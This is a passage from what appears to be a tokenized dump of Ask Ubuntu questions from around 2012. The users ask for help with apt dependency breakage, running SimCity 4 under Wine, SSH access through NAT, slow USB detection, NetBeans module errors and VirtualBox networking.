that i would need to upgrade my kernel . i found instructions on how to do this , but when i ran apt-get to install the new linux headers , i got the same dependency errors . i found another answer here where someone else had had an interruption in their upgrade - and tried the solution that worked for them : sudo apt-get -f dist-upgrade this resulted in the error : e : could not perform immediate configuration on 'python2.7-minimal'.please see man 5 apt.conf under apt : :immediate-configure for details . ( 2 ) i tried to resolve this by : apt-get install -o apt : :immediate-configure=false -f apt python-minimal but this simply ended up with this last list of dependency errors : apt : depends : ubuntu-keyring but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.11.1-0ubuntu7.11 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.4.3-4ubuntu5.1 is to be installed predepends : dpkg ( > = 1.15.7.2 ) but 1.15.5.6ubuntu4.6 is to be installed apt-utils : depends : libapt-pkg-libc6.10-6-4.8 libapt-inst1.4 : depends : libc6 ( > = 2.14 ) but 2.11.1-0ubuntu7.11 is to be installed libapt-pkg4.12 : depends : libc6 ( > = 2.15 ) but 2.11.1-0ubuntu7.11 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.4.3-4ubuntu5.1 is to be installed libc6 : depends : libc-bin ( = 2.11.1-0ubuntu7.11 ) but 2.15-0ubuntu10.2 is to be installed libept0 : depends : libapt-pkg-libc6.10-6-4.8 libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu9 ) but 1.0.1-1 is to be installed python : depends : python-minimal ( = 2.6.5-0ubuntu1 ) but 2.7.3-0ubuntu2 is to be installed python-apt : depends : libapt-pkg-libc6.10-6-4.8 python-minimal : depends : python2.7-minimal ( > = 2.7.3 ) but it is not going to be installed breaks : python-support ( < 1.0.10ubuntu2 ) but 1.0.4ubuntu1 is to be installed synaptic : depends : libapt-pkg-libc6.10-6-4.8 any ideas on how to dig out of this hole ?
199523	how do i run sim city 4 ?	i know that it is possible to run sim city 4 deluxe , as this page clearly proves so . http : //appdb.winehq.org/objectmanager.php ? sclass=version & iid=10515 i have tried two different commands , and the paths are all right , but when i enter them , i simply get a blank terminal line . winedeub=-all wine c : \\program\ files\ \ ( x86\ ) \\maxis\\simcity\ 4\ deluxe\\apps\\simcity\ 4.exe -d : software -intro : off -cpucount:1 env wineprefix= '' /home/jacob/.wine '' wine `` c : \program files ( x86 ) \maxis\simcity 4 deluxe\apps\simcity 4.exe '' -intro : off -cpucount:1 so , what could be the problem ? i 'm fairly new , so i 'm not really sure what info i need to provide . thanks .
199524	is there an easy way to configure an ubuntu system to function as a proxy/file server from behind an nat ?	sorry for the long question , but the situation/desire is quite complex . here is my setup : i have a laptop which i carry around everywhere and i have a desktop sitting at home , connected to the internet through a router using nat . my objective is to create a connection from my laptop to my desktop that can allow me to ( in order of priority ) : use the desktop as a proxy server access files on the desktop remotely control said desktop from the laptop using vnc or similar . now here is the scene . i have already looked up and tried several ways to achieve the above goals . teamviewer - i used it and did n't like it . this is not an option . ssh - this seems ideal , i have figured a way to use this for both proxy and file sharing . however , i am currently unable to connect it due to the nat . i have a separate thread trying to get that to work here . vpn - i 've figured out how to use this method for proxy , but not file sharing . however this faces the same problem as the above : i ca n't get it to connect through the nat . does anyone have any other solutions for what i want ? otherwise , if there are solutions to connecting through the nat , please tell me ( in the other thread ) . thanks
199526	apt-get failed install of libg15 , all package management is failing	i was trying to get my logitech g510 keyboard 's back-lights working so i went into the synaptic package manager and marked libg15 , g15daemon , and all the other associated packages . synaptic reported a failed install . now all package management is failing due to libg15 being `` halfway installed . '' some commands i have tried to fix the problem follow . . . root @ bt : ~ # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done e : the package libg15 needs to be reinstalled , but i ca n't find an archive for it . root @ bt : ~ # sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done e : the package libg15 needs to be reinstalled , but i ca n't find an archive for it . root @ bt : ~ # sudo apt-get -f purge libg15 reading package lists ... done building dependency tree reading state information ... done e : the package libg15 needs to be reinstalled , but i ca n't find an archive for it . root @ bt : ~ # sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of g15macro : g15macro depends on g15daemon ; however : package g15daemon is not configured yet . dpkg : error processing g15macro ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of g15stats : g15stats depends on g15daemon ; however : package g15daemon is not configured yet . dpkg : error processing g15stats ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : g15macro g15stats i 'm not too computer savvy . any help would be much appreciated ! ! ! note : i 'm using ubuntu 10.04 under backtrack 5 r3 .
199529	how do i add a folder or all images in a folder to compiz wallpaper 's background list ?	i have over 100 images in my backgrounds folder . is there an easy way to have compiz wallpaper use all images in a specified directory ? or is there a way to add all images easily from a folder to this list of background images ? adding each image at a time would be a time consuming task . i am using ubuntu 12.04 . thanks in advance , menturi
199530	what is the 64-bit firefox beta ppa ?	i recently discovered that my computer is 64-bit . i have backed up my home folder , and reinstalled ubuntu . the reinstall was n't nearly as painful as i thought . there is one thing that i ca n't quite seem to figure out : how do i get the 64-bit firefox beta build ? i always get the beta builds , but i want to take advantage of the 64-bit architecture of my computer . this page says that mozilla has come out with a 64-bit version of firefox , but i ca n't seem to find it . i do understand the ramifications of using a 64-bit browser , but i 've decided to jump right in and do it anyway . ( flash and java are already 64-bit , and who cares about silverlight , since it 's not for linux anyway ? ) there 's only one issue , and it 's a big one : i ca n't find the 64-bit beta ppa ! ! ! ( i really hate using .tar.gz files , but i 'd be willing to do that as long as i could still access firefox via the launcher . oh , speaking of which , i do n't understand .tar.gz files . once , i managed to run one ( the dropbox beta build , ) but i have no idea whatsoever on how to install them : as in , click on the icon and go . )
199534	how to copy a folder from /home/kevin to /opt	i have a new computer installed with ubuntu 12.04 . then i want to install wireless driver named compat-wireless-3.5-3 . before that , the driver folder to /home/kevin . i want to install it on /opt directory . before install the driver , i want to copy the driver folder from /home/kevin to /opt . i try to use ordinary copy ( right click copy paste ) , but the paste is blured . after that , i tried using this on terminal : sudo cp /home/kevin/compat-wireless-3.5-3 /opt but i get this error : cp : omitting directory `home/kevin/compat-wireless-3.5-3' what does the command mean ? i ca n't copy the driver folder until now .
199536	mouse takes a while to start working after boot	i just recently installed ubuntu 12.04 ( 64 bit ) and a number of my usb devices have stopped working . at least , they do n't work for the first 3-5 minutes . i have two mice ( one wireless , one wired ) and a camera , which seem to take ubuntu 3-5 minutes to recognize after booting up . eventually , they do start to work , but it takes ages ! lsusb results : ( when the mice are working ... ) $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 046d : c512 logitech , inc. lx-700 cordless desktop receiver bus 003 device 003 : id 03f0:3f11 hewlett-packard psc-1315/psc-1317 bus 006 device 002 : id 046d : c00c logitech , inc. optical wheel mouse bus 006 device 003 : id 046d : c52b logitech , inc. unifying receiver syslog entries for what seems ( to my very untrained eye ) to be the problem : oct 12 20:12:51 removed-ga-ma785gm-us2h kernel : [ 17.420117 ] usb 2-3 : device descriptor read/64 , error -110 oct 12 20:12:57 removed-ga-ma785gm-us2h goa [ 1879 ] : goa-daemon version 3.4.0 starting [ main.c:112 , main ( ) ] oct 12 20:13:06 removed-ga-ma785gm-us2h kernel : [ 32.636107 ] usb 2-3 : device descriptor read/64 , error -110 oct 12 20:13:06 removed-ga-ma785gm-us2h kernel : [ 32.852122 ] usb 2-3 : new high-speed usb device number 3 using ehci_hcd oct 12 20:13:21 removed-ga-ma785gm-us2h kernel : [ 47.964131 ] usb 2-3 : device descriptor read/64 , error -110 oct 12 20:13:37 removed-ga-ma785gm-us2h kernel : [ 63.180115 ] usb 2-3 : device descriptor read/64 , error -110 oct 12 20:13:37 removed-ga-ma785gm-us2h kernel : [ 63.396126 ] usb 2-3 : new high-speed usb device number 4 using ehci_hcd oct 12 20:13:47 removed-ga-ma785gm-us2h kernel : [ 73.804158 ] usb 2-3 : device not accepting address 4 , error -110 oct 12 20:13:47 removed-ga-ma785gm-us2h kernel : [ 73.916190 ] usb 2-3 : new high-speed usb device number 5 using ehci_hcd oct 12 20:13:58 removed-ga-ma785gm-us2h kernel : [ 84.324160 ] usb 2-3 : device not accepting address 5 , error -110 oct 12 20:13:58 removed-ga-ma785gm-us2h kernel : [ 84.324197 ] hub 2-0:1.0 : unable to enumerate usb device on port 3 oct 12 20:13:58 removed-ga-ma785gm-us2h udev-configure-printer : failed to claim interface oct 12 20:13:58 removed-ga-ma785gm-us2h udev-configure-printer : failed to get parent oct 12 20:13:58 removed-ga-ma785gm-us2h udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:12.0/usb3/3-3 oct 12 20:13:58 removed-ga-ma785gm-us2h udev-configure-printer : mfg : hp mdl : psc 1310 series sern : cn47cb60bjo2 serial : cn47cb60bjo2 oct 12 20:13:58 removed-ga-ma785gm-us2h kernel : [ 84.768132 ] usb 5-3 : new full-speed usb device number 2 using ohci_hcd oct 12 20:14:01 removed-ga-ma785gm-us2h udev-configure-printer : no corresponding cups device found oct 12 20:14:13 removed-ga-ma785gm-us2h kernel : [ 99.904185 ] usb 5-3 : device descriptor read/64 , error -110 oct 12 20:14:29 removed-ga-ma785gm-us2h kernel : [ 115.144188 ] usb 5-3 : device descriptor read/64 , error -110 oct 12 20:14:29 removed-ga-ma785gm-us2h kernel : [ 115.384178 ] usb 5-3 : new full-speed usb device number 3 using ohci_hcd oct 12 20:14:44 removed-ga-ma785gm-us2h kernel : [ 130.520196 ] usb 5-3 : device descriptor read/64 , error -110 oct 12 20:14:59 removed-ga-ma785gm-us2h kernel : [ 145.760179 ] usb 5-3 : device descriptor read/64 , error -110 oct 12 20:14:59 removed-ga-ma785gm-us2h kernel : [ 146.000173 ] usb 5-3 : new full-speed usb device number 4 using ohci_hcd oct 12 20:15:10 removed-ga-ma785gm-us2h kernel : [ 156.408168 ] usb 5-3 : device not accepting address 4 , error -110 oct 12 20:15:10 removed-ga-ma785gm-us2h kernel : [ 156.544188 ] usb 5-3 : new full-speed usb device number 5 using ohci_hcd oct 12 20:15:20 removed-ga-ma785gm-us2h kernel : [ 166.952181 ] usb 5-3 : device not accepting address 5 , error -110 oct 12 20:15:20 removed-ga-ma785gm-us2h kernel : [ 166.952215 ] hub 5-0:1.0 : unable to enumerate usb device on port 3 oct 12 20:15:21 removed-ga-ma785gm-us2h kernel : [ 167.216164 ] usb 6-2 : new low-speed usb device number 2 using ohci_hcd oct 12 20:15:21 removed-ga-ma785gm-us2h mtp-probe : checking bus 6 , device 2 : `` /sys/devices/pci0000:00/0000:00:13.1/usb6/6-2 '' oct 12 20:15:21 removed-ga-ma785gm-us2h mtp-probe : bus : 6 , device : 2 was not an mtp device oct 12 20:15:21 removed-ga-ma785gm-us2h kernel : [ 167.396138 ] input : logitech usb mouse as /devices/pci0000:00/0000:00:13.1/usb6/6-2/6-2:1.0/input/input16 oct 12 20:15:21 removed-ga-ma785gm-us2h kernel : [ 167.396442 ] generic-usb 0003:046d : c00c.0003 : input , hidraw2 : usb hid v1.10 mouse [ logitech usb mouse ] on usb-0000:00:13.1-2/input0 oct 12 20:15:21 removed-ga-ma785gm-us2h kernel : [ 167.660187 ] usb 6-3 : new full-speed usb device number 3 using ohci_hcd oct 12 20:15:21 removed-ga-ma785gm-us2h mtp-probe : checking bus 6 , device 3 : `` /sys/devices/pci0000:00/0000:00:13.1/usb6/6-3 '' oct 12 20:15:21 removed-ga-ma785gm-us2h mtp-probe : bus : 6 , device : 3 was not an mtp device oct 12 20:15:21 removed-ga-ma785gm-us2h kernel : [ 167.859045 ] logitech-djreceiver 0003:046d : c52b.0006 : hiddev0 , hidraw3 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:13.1-3/input2 oct 12 20:15:21 removed-ga-ma785gm-us2h kernel : [ 167.865086 ] input : logitech unifying device . wireless pid:400a as /devices/pci0000:00/0000:00:13.1/usb6/6-3/6-3:1.2/0003:046d : c52b.0006/input/input17 oct 12 20:15:21 removed-ga-ma785gm-us2h kernel : [ 167.865291 ] logitech-djdevice 0003:046d : c52b.0007 : input , hidraw4 : usb hid v1.11 mouse [ logitech unifying device . wireless pid:400a ] on usb-0000:00:13.1-3:1 oct 12 20:15:24 removed-ga-ma785gm-us2h colord : io/hpmud/musb.c 139 : unable get_string_descriptor -1 : operation not permitted oct 12 20:15:24 removed-ga-ma785gm-us2h colord : io/hpmud/musb.c 2040 : invalid product id string ret=-1 oct 12 20:15:24 removed-ga-ma785gm-us2h colord : io/hpmud/musb.c 139 : unable get_string_descriptor -1 : operation not permitted oct 12 20:15:24 removed-ga-ma785gm-us2h colord : io/hpmud/musb.c 2045 : invalid serial id string ret=-1 oct 12 20:15:24 removed-ga-ma785gm-us2h colord : io/hpmud/musb.c 139 : unable get_string_descriptor -1 : operation not permitted oct 12 20:15:24 removed-ga-ma785gm-us2h colord : io/hpmud/musb.c 2050 : invalid manufacturer string ret=-1
199540	tweeter destroyed by ultra high volume . any kind of protection ?	i was listening to a music track at a moderate volume through hdmi out and i guess i had turned the volume in the application down quite a bit and had the receiver turned up . an ad movie in my browser randomly started playing at a super ultra high volume and blew out a tweeter in my $ 1000 speakers . is there any kind of software protection for this kind of thing in the future ? i 'm using all stock drivers in 12.04.1 with the recommended nvidia proprietary drivers , although it does n't seem like the nvidia driver is controlling the sound through the hdmi out .
199541	solving the ubuntu 12.04 update error : ( -5 - no address associated with hostname )	problem description : each time i try to download the updates for my operating system ( ubuntu 12.04 ) i get the following list of error messages : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) , w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/precise/release.gpg something wicked happened resolving 'ppa.launchpad.net : http ' ( -5 - no address associated with hostname ) , w : failed to fetch http : //packages.medibuntu.org/dists/precise/release.gpg something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) , w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/release.gpg something wicked happened resolving 'archive.canonical.com : http ' ( -5 - no address associated with hostname ) , w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/precise/release.gpg something wicked happened resolving 'ppa.launchpad.net : http ' ( -5 - no address associated with hostname ) , e : some index files failed to download . they have been ignored , or old ones used instead . the contents of ( /etc/apt/sources.list ) file : # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb-src http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main the files inside of ( /etc/apt/sources.list.d ) directory : -rw-r -- r -- 1 root root 136 oct 10 16:30 deluge-team-ppa-precise.list -rw-r -- r -- 1 root root 136 oct 10 16:30 deluge-team-ppa-precise.list.save -rw-r -- r -- 1 root root 285 oct 10 16:30 medibuntu.list -rw-r -- r -- 1 root root 285 oct 10 16:30 medibuntu.list.save -rw-r -- r -- 1 root root 132 oct 10 16:30 tualatrix-ppa-precise.list -rw-r -- r -- 1 root root 134 oct 10 16:30 tualatrix-ppa-precise.list.save -rw-r -- r -- 1 root root 148 oct 10 16:30 yannubuntu-boot-repair-precise.list -rw-r -- r -- 1 root root 148 oct 10 16:30 yannubuntu-boot-repair-precise.list.save related links to this post on askubuntu.com : server error ( -5 - no address associated with hostname ) how to fix `` -5 no address associated with hostname error '' while updating ? i have tried to research online for ways to solve the issue but i failed to figure out the real reason why i am getting those errors . any suggestions , ideas or solutions that might aid me to solve this issue are greatly appreciated .
199545	ca n't ssh into my ubuntu vps	i have a vps running ubuntu 12.04 lts and i have installed openssh but i ca n't connect to it with putty . i get error saying network error : connection timed out . how to fix this ?
199551	ufw not allowing transmission to transfer	i have set the rules in ufw for transmission but when i try to use it it will not transfer and it also says the port is closed when checked under preferences . if i turn the ufw firewall off it still says that the port is closed but it transfers fine . i then can turn the ufw back on and it continues to work . i have tried setting up port forwarding in my router ( asus rtn12 using dd-wrt 17990 ) but that has no effect on the closed port message or transferring . is there a specific port that should be opened in ufw to allow the transfers or am i just missing something ? i 'm a linux nube so please explain any answers a little more thoroughly than normal . thanks in advance .
199556	clamtk gives wrong warning ?	i scanned my computer using clamtk and it reported several threats , but most of the files it indicated as threats are files from my netbeans ide . ( highly trustable source ) are my netbeans files really infected or clamtk gives wrong warning ? i am using ubuntu 12.04 lts and properly update regularly with important security updates .
199557	how can i include a custom command in deb file , to be executed at the end of installation ?	well , i like to mark /usr/bin/program.sh as executable using following command : chmod +x /usr/bin/program.sh i want the above command to be executed at the end of installation of the debian package . is there a painless way to inject the command into the deb ? thanks for looking !
199563	suggest different version for this configuration because ubuntu 12.04 taking too long to bootup & performing real slow	i have 768mb ram and 1.7ghz intel processor . i think that 's the problem . so please recommend me a lighter version of ubuntu . that will give me optimum performance . because i have seen it performing really well even on lower configuration systems .
199565	update failing . not enough space on /tmp	im not being able to run update manager as i get the error saying that there is not enough free space in the /tmp directory . i 've practically cleaned out the tmp directory but the error persists . any help would be appreciated . here 's df-h /dev/loop0 13g 11g 952m 92 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 785m 920k 784m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 584k 2.0g 1 % /run/shm /dev/sda6 20g 14g 6.4g 68 % /host overflow 1.0m 16k 1008k 2 % /tmp thanks .
199569	network connection between two laptops communication problem ?	i have two laptops ( both wifi enabled ) and a wireless router . i want to use one of the laptop on a robot and other laptop to ssh into the first one . is it possible to connect the two pcs even if i do n't have a modem or internet and just use the wifi router ? if so how to do that ? i learned about the ad-hoc network , but i am unable to create an ad-hoc network on my macbook pro 6'2 with ubuntu 11.10 , so i need an alternate method .
199571	grub not recognising copied partition	i 've been following the instructions on this page to copy my linux partition from one partition to another on the same drive . ( i 'm doing this because i want to move it from /dev/sda3 to /dev/sda4 so that i can then resize /dev/sda2 and use my drive more efficiently ) . i got up to `` 1 . reboot you machine again '' under step 6 , but 'ubuntu ' on the copied partition never appears in the grub boot menu . i only ever see my original /dev/sda3 version . i have tried reinstalling grub and it says it 's been successful , but there 's no change . are those instructions wrong ? is there just something wierd with my computer ? can you suggest how to get this working ?
199575	ubuntu one mac beta : how do i move the ubuntu one folder ?	i 've just installed the ubuntu one mac beta client and it syncs a folder called ~/ubuntu one . however , i do n't want this folder in my home directory . how can i move it or rename it so that another folder is my only sync'ed folder ? for example , if i do n't want ~/ubuntu one , but i want a sync'ed folder called ~/cloud/ubuntu/one ? thanks . david
199581	my toshiba touchpad not working	can you give a solution for this problem . my touch pad stopped working all of a sudden in 12.04 . i think its a bug . please give a solution .
199588	ubuntu 11.10 has some problem with gui	once power on the system , after some time the gui of all most all window has changed ( look at the image ) . into thunderbird all text are overlapped and display mashed up . into geany color all tabs and code are changed . i need to close those apps and reopen it to view it correctly . i have 1 gb of ram . i am new to ubuntu . can any body help me what it the problem ? and how to solve it ? i have read the question weird ubuntu 11.10 gui problem , but it does not solve my problem . thanks edit i have tried the solution given by maythux , but it does not solve my problem . after applied his solution my page looks like this : i do not want this . i want my same theme without mash up the graphics . and permanent solution . if anybody has solution of it please give me .
199591	will kubuntu run on 256 mb ram ?	for two weeks , i have been trying to install kubuntu 12.04.1 onto a kingston usb stick to run on my acer aspire 1362 laptop , which has 256mb ram . firstly i downloaded : kubuntu-2.04.1-desktop-i386.iso from the getkubuntu website . to install it on the usb i tried universal-usb-installer-1.9.1.1.exe from pendrivelinux website . this did n't work completely so i tried linuxlive usb creator 2.8.16.exe from the linux live website . in both cases i received a message indicating a successful installation and the usb was clearly trying to boot to kububtu , but failed to get as far as the login screen . in searching web resources i have found a suggestion that kubuntu is happier with at least 512mb ram , but will run ( albeit slowly ) on as little as 256 . can anyone help on this , please ? has anyone successfully installed kubuntu on laptop with so little memory â if so how and what version of kubuntu ? - or should i try another linux ?
199594	ubuntu restricted extras after install ubuntu 12.04	what is the ubuntu restricted extras should installed ( ubuntu restricted extras ) after the install ubuntu 12.04 ?
199596	completely uninstall ubuntu 12.04.1	i want to completely uninstall ubuntu 12.04.1 . because i 'm really frustating while use this os . please help me how to uninstall 12.04.1 os . i have it 's live cd .
199605	in ubuntu 11.10 ide like dreamweaver for php with design mode	i know that this question is already asked here , but i did not find any free ide like dreamweaver which have facility to view design mode with php+html code . i am previously worked on windows machine and used dreamweave , now i moved to ubuntu 11.10 and i need ide like dreamweaver . currently i have used geany and eclipse but none of them has facility of design mode . is there any add-on available for geany or eclipse then please give it link to me . i am new to ubuntu so , did not have much knowledge of it and because of it i am here for answer . thanks in advance . pkachhia
199606	install both python 2.7 and python 3.3.0 on ubuntu 12.04	i have projects that require different resources from the two different versions of python . my question is can i have both versions of python installed and if i can how do i switch between the two in different projects . any help afforded is appreciated ! mojo706
199610	piping with ssh and split the file	im using tar zcf - stuff | ssh user @ server 'cat > data.tar.gz' is there a way to split the file on transfer ? something like this : tar zcf - stuff | split -b 5g | ssh user @ server 'cat > data- $ { part } .tar.gz' thanks in advance !
199613	how to find the cause of a gui freeze ?	from time to time unity just freezes . it works just fine again after i restart the gui with sudo service lightdm restart but is there a way i can find what causes the freeze ?
199622	can not load swt library `` unsatisfiedlinkerror : no swt-gtk-4233 ''	i 'm a java newbie who just a made a simple java program using swt for gui via eclipse juno . the code was working and the program was able to run inside eclipse , so i compiled it and made it a runnable jar file so it can be run outside eclipse . i tried to run it using the terminal and this error came up . exception in thread `` main '' java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-4233 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/abody/.swt/lib/linux/x86_64/libswt-gtk-4233.so ca n't load library : /home/abody/.swt/lib/linux/x86_64/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:331 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:240 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:133 ) at class1.main ( class1.java:12 ) so now it looks like it ca n't find libswt-gtk-4233.so and the other file . however , when i took a look at the .swt folder i had an libswt-gtk-3740.so not 4233 . so its trying to find a file that is more up-to-date . so what does that mean , should i update swt ? what 's going on ?
199626	how do i detect if an external drive is already mounted ?	i have a script that backup up files to the external drive each night . the problem is that nautilus auto mounts the external drive and when the script runs it fails to mount the external drive . the mount point that the script creates in /mnt/mirror and the mount point the nautilus creates is /mnt/mirror_ how do i detect if an external drive is already mounted ?
199627	how do i detect what device an external hdd is mapped to ?	i want to backup data to an external drive that is always connected to the same external usb port . how do i detect what device the external drive is mapped to ?
199629	looks like a font is missing	nautilus has become like this : global menus now have this ugly font . any idea why ? it looks like an update killed it .
199631	guest account asking password	hi gone through strange issue . guest account asked me a password after i have selected lock screen option from top panel . give a try with guest or enter but nothing up
199638	netbeans 7.2 missing modules warning	everytime i start netbeans and the splash screen shows up when it gets to the part to load the modules i receive the following error message : warning - could not install some modules : editor library 2 - none of the modules providing the capability org.netbeans.modules.editor.actions could be installed . tags based editors library - the module named org.netbeans.modules.editor.deprecated.pre65formatting/0-1 was needed and not found . java editor library - the module named org.netbeans.modules.editor.deprecated.pre65formatting/0-1 was needed and not found . preprocessor bridge - none of the modules providing the capability org.netbeans.modules.java.preprocessorbridge.spi.javasourceutilimpl could be installed . freeform ant projects - the module named org.netbeans.modules.editor.indent.project/0-1 was needed and not found . editor code templates - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . static analysis core - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . java source - the module named org.netbeans.modules.editor.indent.project/0-1 was needed and not found . eclipse project importer - the module named org.netbeans.modules.java.api.common/0-1 was needed and not found . java hints spi - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . java refactoring - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . java editor - the module named org.netbeans.modules.editor.bracesmatching/0-1 was needed and not found . java editor - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . java editor - the module named org.netbeans.modules.editor.deprecated.pre65formatting/0-1 was needed and not found . java hints ui - the module named org.netbeans.modules.code.analysis/0-1 was needed and not found . java hints ui - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . legacy java hints spi - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . java hints - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . java declarative hints - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . javadoc - the module named org.netbeans.modules.editor.bracesmatching/0-1 was needed and not found . javadoc - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . common scripting language api ( new ) - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . xml text editor - the module named org.netbeans.modules.editor.bracesmatching/0-1 was needed and not found . xml text editor - the module named org.netbeans.modules.editor.deprecated.pre65formatting/0-1 was needed and not found . css editor - the module named org.netbeans.modules.editor.bracesmatching/0-1 was needed and not found . html editor - the module named org.netbeans.modules.editor.bracesmatching/0-1 was needed and not found . javascript editing - the module named org.netbeans.modules.editor.bracesmatching/0-1 was needed and not found . javascript hints - the module named org.netbeans.spi.editor.hints/0-1 was needed and not found . editing files - the module named org.netbeans.modules.editor.bracesmatching/0-1 was needed and not found . ide platform - the module named org.netbeans.modules.editor.macros/0-1 was needed and not found . java se projects - the module named org.netbeans.modules.java.api.common/0-1 was needed and not found . 86 further modules could not be installed due to the above problems . whatever i press either exit or disable modules and continue or even i close from the `` x '' button the warning window closes and then netbeans never starts . i have looked it up on the internet , but i could n't find a solution .
199640	my pc is now loading from the wrong drive	i installed 12.04 on my pc months ago alongside windows xp . both are on separate drives . the pc loads ubuntu as default however recently it stopped recognising it as the default and now loads xp . i have n't changed any settings . if i unplug the drive with xp on , ubuntu loads up fine . i do need the xp from time to time for some of my work but i use ubuntu the rest of the time as it 's superior . the question is , how do i fix it so that ubuntu is default again . there does n't seem to be any way within xp , not that i can find anyway . regards
199644	hp officejet 6600	g'day all , i 'm due for a new all-in-one printer/scanner . i 'm thinking of a hp officejet 6600 with wifi . apparently it does i-printing as well . i ca n't find a straight forward driver for cups so this leads to a number of questions : does anyone have any experience with the machine ? recommendations ? ? and/or alternative ? does it require hplip ? how does hplip compare to cups ? do they conflict ? ie . must i remove cups ? any advice is sincerely welcome .
199647	how to test other de in ubuntu 12.10 live ( alpha )	caution : 12.10 is not yet released but i was told it will say as is also when release happens ( live session ) so , new ubuntu live session does not have option to `` logout '' and choose different desktop environment ( de ) . this function was usable if one installs ubuntu live on usb stick with permanent changes . one can install any software , including kde ( plasma ) or lxde . until including 12.04 , one could simply logout and choose different de . now , there is no `` logout '' option in top right menu and if ran service lightdm restart it automatically logs in to live session account with unity .
199648	ca n't ping virtualbox client operating system	i have installed virtual box on host ubuntu 12.04 and rhel 5.5 as client . i need to do file sharing between em . and i can access the shared folder of ubuntu from rhel using shared folder service builtin vb . and now i want to access a file that is on rhel but the thing is this i ca n't access it . and i ca n't even ping any . ubuntu hostname : : inspiron-n5110 rhel hostname : : redhat ping from ubuntu to redhat umair @ inspiron-n5110 : ~ $ ping redhat ping : unknown host redhat ping from redhat to ubuntu ping inspiron-n5110 ping : unknown host inspiron-n5110 network is nat actually that is quite strange that i ca n't even ping host system itself means when i do ping inspiron-n5110 it replies that ping : unknown host inspiron-n5100 and same is the case for client system .
